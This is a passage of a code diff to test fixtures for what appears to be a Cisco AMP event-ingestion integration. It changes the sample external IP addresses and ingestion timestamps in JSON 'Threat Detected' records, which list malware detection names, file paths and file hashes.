Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "ingested": "2021-12-09T13:35:36.337179600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2206,7 +2206,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -2257,7 +2257,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2267,8 +2267,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174561746Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337185500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2290,7 +2290,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2349,7 +2349,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2366,8 +2366,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174563786Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "ingested": "2021-12-09T13:35:36.337190500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2389,7 +2389,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -2440,7 +2440,7 @@
 "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2450,8 +2450,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174565817Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337194500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2473,7 +2473,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2520,7 +2520,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2530,8 +2530,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174567845Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337199200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2553,7 +2553,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2603,7 +2603,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2620,8 +2620,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174569865Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337205100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2643,7 +2643,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2693,7 +2693,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2706,8 +2706,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174571915Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337210900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2729,7 +2729,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2779,7 +2779,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2796,8 +2796,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174573957Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce